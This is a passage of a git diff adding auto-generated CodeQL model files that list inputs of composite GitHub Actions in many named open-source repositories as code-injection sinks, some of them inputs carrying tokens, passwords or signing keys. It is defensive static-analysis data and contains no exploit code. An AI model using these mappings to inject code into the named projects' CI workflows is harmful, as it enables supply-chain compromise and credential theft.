ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scitools_iris.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/stellar_go.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/subquery_subql.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml new file mode 100644 index 000000000000..4bc9d5ed7712 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["actions/actions-runner-controller", "*", "inputs.image-tag", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.image-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-controller-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.repo-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.repo-owner", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.workflow-file", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.auth-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml new file mode 100644 index 000000000000..3ce175684905 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["adap/flower", "*", "inputs.poetry-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.setuptools-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.pip-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml new file mode 100644 index 000000000000..80a23352e55b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["agoric/agoric-sdk", "*", "inputs.xsnap-random-init", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.path", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.ignore-endo-branch", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.codecov-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.datadog-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.datadog-site", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml new file mode 100644 index 000000000000..441c8ebcd52a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbnb/lottie-ios", "*", "inputs.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml new file mode 100644 index 000000000000..d4e8a2c32bf3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbytehq/airbyte", "*", "inputs.options", "code-injection", "generated"] + - ["airbytehq/airbyte", "*", "inputs.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml new file mode 100644 index 000000000000..ce3ed699b9ab --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["amazon-ion/ion-java", "*", "inputs.project_version", "code-injection", "generated"] + - ["amazon-ion/ion-java", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml new file mode 100644 index 000000000000..8b62fe8e0aad --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/grype", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml new file mode 100644 index 000000000000..946faca35c93 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/syft", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml new file mode 100644 index 000000000000..b68c9462c1bb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["angular/dev-infra", "*", "inputs.firebase-public-dir", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.workflow-artifact-name", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.artifact-build-revision", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.pull-number", "code-injection", "generated"] + - ["angular/dev-infra", "*", "inputs.deploy-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml new file mode 100644 index 000000000000..aedefc9ee02b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ansible/ansible-lint", "*", "inputs.args", "code-injection", "generated"] + - ["ansible/ansible-lint", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml new file mode 100644 index 000000000000..36f7a18e1989 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ansible/awx", "*", "inputs.log-filename", "code-injection", "generated"] + - ["ansible/awx", "*", "inputs.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml new file mode 100644 index 000000000000..a1d324f44bdf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow-datafusion", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml new file mode 100644 index 000000000000..53142801fecd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow-rs", "*", "inputs.target", "code-injection", "generated"] + - ["apache/arrow-rs", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml new file mode 100644 index 000000000000..5170beb3a7aa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/arrow", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml new file mode 100644 index 000000000000..1fabdd9085b2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/bookkeeper", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml new file mode 100644 index 000000000000..370d3c6954ee --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/brpc", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml new file mode 100644 index 000000000000..ac0156b719fb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/camel-k", "*", "inputs.test-suite", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-registry-insecure", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-registry-host", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.catalog-source-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.catalog-source-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.image-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.otlp-collector-image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.otlp-collector-image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "inputs.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml new file mode 100644 index 000000000000..9ee197ed8848 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/camel", "*", "inputs.end-commit", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.start-commit", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.distribution", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.version", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.pr-id", "code-injection", "generated"] + - ["apache/camel", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml new file mode 100644 index 000000000000..99a1e4cec710 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/flink", "*", "inputs.maven-parameters", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.env", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.target_directory", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.source_directory", "code-injection", "generated"] + - ["apache/flink", "*", "inputs.jdk_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml new file mode 100644 index 000000000000..d2a6dbd4929e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/nuttx", "*", "inputs.haskell", "code-injection", "generated"] + - ["apache/nuttx", "*", "inputs.dotnet", "code-injection", "generated"] + - ["apache/nuttx", "*", "inputs.android", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml new file mode 100644 index 000000000000..13a9ff475b92 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/opendal", "*", "inputs.feature", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.setup", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.service", "code-injection", "generated"] + - ["apache/opendal", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml new file mode 100644 index 000000000000..a173154bec07 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/pekko", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml new file mode 100644 index 000000000000..f7a5017d2fb5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-users", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-actor", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.secure-access", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.action", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.yamale_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.yamllint_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml new file mode 100644 index 000000000000..1bcf118810ff --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/superset", "*", "inputs.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml new file mode 100644 index 000000000000..fb210d5af55c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["appflowy-io/appflowy", "*", "inputs.test_path", "code-injection", "generated"] + - ["appflowy-io/appflowy", "*", "inputs.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml new file mode 100644 index 000000000000..77554b9872e3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aptos-labs/aptos-core", "*", "inputs.GIT_CREDENTIALS", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "inputs.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml new file mode 100644 index 000000000000..7fc1eaaca483 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["archivesspace/archivesspace", "*", "inputs.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml new file mode 100644 index 000000000000..921095f8a380 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["armadaproject/armada", "*", "inputs.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml new file mode 100644 index 000000000000..e8dba39c742c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["armbian/build", "*", "inputs.armbian_pgp_password", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_extensions", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_release", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_kernel_branch", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_board", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_target", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_branch", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_ui", "code-injection", "generated"] + - ["armbian/build", "*", "inputs.armbian_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml new file mode 100644 index 000000000000..69970d3419b2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0-java", "*", "inputs.signing-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.signing-key", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.ossr-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "inputs.ossr-username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml new file mode 100644 index 000000000000..b57797cc643c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0.net", "*", "inputs.nuget-token", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "inputs.nuget-directory", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "inputs.project-paths", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml new file mode 100644 index 000000000000..08b65cea6d72 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["auth0/auth0.swift", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml new file mode 100644 index 000000000000..453e60f3595e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["autogluon/autogluon", "*", "inputs.submodule-to-test", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.command", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.work-dir", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.job-name", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml new file mode 100644 index 000000000000..012802b80063 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["avaiga/taipy", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml new file mode 100644 index 000000000000..a397a77f6dc1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws-amplify/amplify-cli", "*", "inputs.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml new file mode 100644 index 000000000000..15de610c9812 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws/amazon-vpc-cni-k8s", "*", "inputs.go-package", "code-injection", "generated"] + - ["aws/amazon-vpc-cni-k8s", "*", "inputs.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml new file mode 100644 index 000000000000..ad6e7e806cd0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws/karpenter-provider-aws", "*", "inputs.account_id", "code-injection", "generated"] + - ["aws/karpenter-provider-aws", "*", "inputs.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml new file mode 100644 index 000000000000..67631102d71f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["awslabs/amazon-eks-ami", "*", "inputs.max_resource_age_duration", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.aws_region", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.ami_id", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.k8s_version", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.os_distro", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.additional_arguments", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "inputs.build_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml new file mode 100644 index 000000000000..098d7c139fa5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["awslabs/aws-lambda-rust-runtime", "*", "inputs.package", "code-injection", "generated"] 